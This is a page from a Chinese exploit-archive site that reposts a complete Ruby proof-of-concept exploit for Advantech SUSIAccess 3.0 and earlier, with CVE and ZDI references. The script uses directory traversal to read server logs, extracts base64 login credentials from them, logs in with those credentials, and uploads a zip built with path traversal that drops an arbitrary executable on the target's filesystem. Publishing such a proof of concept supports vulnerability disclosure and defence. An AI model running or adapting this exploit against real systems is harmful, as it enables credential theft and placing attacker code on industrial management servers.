首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Advantech SUSIAccess <= 3.0 - 'RecoveryMgmt' File Upload
来源:vfocus.net 作者:Fitts 发布时间:2017-08-02  
#! /usr/bin/env ruby
 
=begin
Exploit Title: Advantech SUSIAccess RecoveryMgmt File Upload
Date: 07/31/17
Exploit Author: james fitts
Vendor Homepage: http://www.advantech.com/
Version: Advantech SUSIAccess <= 3.0
Tested on: Windows 7 SP1
Relavant Advisories:
    ZDI-16-630
    ZDI-16-628
    CVE-2016-9349
    CVE-2016-9351
    BID-94629
    ICSA-16-336-04
 
Notes:
    This PoC will upload AcronisInstaller.exe to the root of C:\
    You can modify this to drop files where ever you want on the
    filesystem.
 
    By default the script will use the directory traversal vuln
    to pull down the log files and parse for the base64 encoded
    credentials. Once it has that, it will use them to log into
    the application and upload the malicious zip file.
=end
 
require 'mime/types'
require 'fileutils'
require 'net/http'
require 'nokogiri'
require 'base64'
require 'digest'
require 'date'
require 'uri'
require 'zip'
 
def uploadZip(target, creds, cookies)
    uri = URI("http://#{target}:8080/webresources/RecoveryMgmt/upload")
    bound = "AaBbCcDdEe"
 
    path = Dir.pwd
    zipfile = "#{path}/update.zip"
 
    post_data = []
    post_data << "--#{bound}\r\n"
    post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_LastUpdateName\""
    post_data << "\r\n\r\n\r\n"
    post_data << "--#{bound}\r\n"
    post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_UploadFileFullName\""
    post_data << "\r\n\r\nupdate.zip\r\n"
    post_data << "--#{bound}\r\n"
    post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_Content\""
    post_data << "\r\n\r\n"
    post_data << "<request Authorization=\"#{creds[0].to_s}\"/>\r\n"
    post_data << "--#{bound}\r\n"
    post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_FileInput\"; filename=\"update.zip\""
    post_data << "\r\nContent-Type: application/zip"
    post_data << "\r\n\r\n"
    post_data << File.read(zipfile)
    post_data << "\r\n\r\n--#{bound}--\r\n"
 
    req = Net::HTTP::Post.new(uri, initheader = {
            'Cookie'                        =>   cookies,
            'Authorization'         =>   "Basic #{creds[0].to_s}",
            'X-Requested-With'  =>   "XMLHttpRequest",
            'Content-Type'          =>   "multipart/form-data; boundary=#{bound}",
            'User-Agent'                =>   "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
            'Accept-Language'       =>   "en-US,en;q=0.5",
            'Accept'                        =>   "text/plain, */*; q=0.01",
            'Connection'                =>   "close"
    })
 
    req.body = post_data.join
 
    http = Net::HTTP.new("#{target}", 8080)
    res = http.start {|http| http.request(req)}
 
    if res.code =~ /200/
        puts "[+] Upload successful!"
    end
end
 
def craftZip(target, payload)
    path = "../../../../../../../../../../Program%20Files\\Advantech\\SUSIAccess%203.0%20Server\\Setting.xml"
 
    uri = URI("http://#{target}:8080/downloadCSV.jsp?file=#{path}")
    res = Net::HTTP.get_response(uri)
    xml = Nokogiri::XML(res.body)
    ver = xml.xpath('//setting/Configuration/ThridParty/Acronis/version').to_s.split("=")[1].split("\"")[1]
    kern_ver = xml.xpath('//setting/Configuration/ThridParty/Acronis/kernal_version').to_s.split("=")[1].split("\"")[1]
 
    # version information doesn't matter
    # the application will still extract the zip
    # file regardless of whether or not its
    # a greater version or lesser
    f = File.open("LatestVersion.txt", 'w')
    f.puts("Installer Version: #{ver}\r\nApplication Version: #{kern_ver}")
    f.close
 
    f = File.open("md5.txt", 'w')
    md5 = Digest::MD5.hexdigest(File.read("AcronisInstaller.exe"))
    f.puts md5
    f.close
 
    path = Dir.pwd
    zipfile = "#{path}/update.zip"
 
    if File.exist?(zipfile)
        FileUtils.rm(zipfile)
    end
 
    files = ["AcronisInstaller.exe", "LatestVersion.txt", "md5.txt"]
 
    levels = "../" * 10
    Zip::File.open(zipfile, Zip::File::CREATE) do |zip|
        files.each do |fname|
            if fname == "AcronisInstaller.exe"
                zip.add("#{levels}#{fname}", fname)
            end
            zip.add(fname, fname)
        end
    end
 
    if File.exist?(zipfile)
        puts "[!] Malicious zip created successfully"
    end
end
 
def doLogin(target, creds)
    formattedDate = DateTime.now.strftime("%a %b %d %Y %H:%M:%S GMT-0400 (EDT)")
    formattedDate = URI::encode(formattedDate)
 
    uri = URI("http://#{target}:8080/frmServer.jsp?d=#{formattedDate}")
 
    res = Net::HTTP.get_response(uri)
    jsessid = res.header['Set-Cookie'].split(';')[0]
    cookies = "deviceType=pc; log4jq=OFF; selectedLang=en_US; #{jsessid}"
 
    uname = Base64.decode64(creds[0].to_s).split(":")[0]
    pass = Base64.decode64(creds[0].to_s).split(":")[1]
 
    data = "<request Authorization=\"#{creds[0].to_s}\">"
    data << "<item name=\"username\" value=\"#{uname}\"/>"
    data << "<item name=\"password\" value=\"#{pass}\"/>"
    data << "</request>"
 
    puts "[+] Attempting login with pilfered credentials now"
    uri = URI("http://#{target}:8080/webresources/AccountMgmt/Login")
 
    req = Net::HTTP::Post.new(uri, initheader = {
        'Content-Type'      =>  "application/xml",
        'Cookies'           =>  cookies,
        'Authorization'     =>  "Basic #{creds[0].to_s}",
        'X-Requested-With'  =>  'XMLHttpRequest'
    })
 
    req.body = data
 
    http = Net::HTTP.new("#{target}", 8080)
    res = http.start {|http| http.request(req)}
 
    if res.body =~ /<result><role name/
        puts "[+] Login successful!"
        return cookies
    else
        puts "[-] Something went wrong..."
    end
    
end
 
def getCreds(target)
    cnt = 1
    d = Date.today
    d.strftime("%y-%m-%d")
    creds = []
 
    while cnt < 31
        fdate = d - cnt
        cnt += 1
 
        path = "../../../../../../../../../../Program Files\\Apache Software Foundation\\logs\\"
        file = "localhost_access_log.#{fdate}.txt"
        full_path = path + file
 
        uri = URI("http://#{target}:8080/downloadCSV.jsp?file=#{full_path}")
 
        res = Net::HTTP.get_response(uri)
 
        if res.code =~ /200/
            creds << res.body.scan(/(?<=Authorization=%22)[A-Za-z0-9=]+/)
        end
    end
    return creds.flatten.uniq
end
 
##
# Main
##
if ARGV.length != 1
    puts "Usage:\r\n\truby #{$0} [TARGET IP]"
else
    target = ARGV[0]
    payload = "AcronisInstaller.exe"
    
    puts "[+] Extracting credentials now..."
    credentials = getCreds(target)
    if credentials.length > 0
        puts "[!] Credentials found!"
        cookies = doLogin(target, credentials)
        puts "[+] Crafting malicious zip now..."
        craftZip(target, payload)
        uploadZip(target, credentials, cookies)
    else
        puts "[-] Credentials not found.. Try searching for more log files.."
        exit
    end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Microsoft Windows LNK Shortcut
·Advantech SUSIAccess <= 3.0 -
·DiskBoss Enterprise 8.2.14 - B
·Jenkins < 1.650 - Java Deseria
·Bittorrent 7.10.0 (Build 43581
·GitHub Enterprise < 2.8.7 - Re
·AudioCoder 0.8.46 - Local Buff
·MediaCoder 0.8.48.5888 - Local
·Microsoft Windows - LNK Shortc
·VICIdial 2.9 RC 1 to 2.13 RC1
·IPFire < 2.19 Update Core 110
·Razer Synapse 2.20.15.1104 - r
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved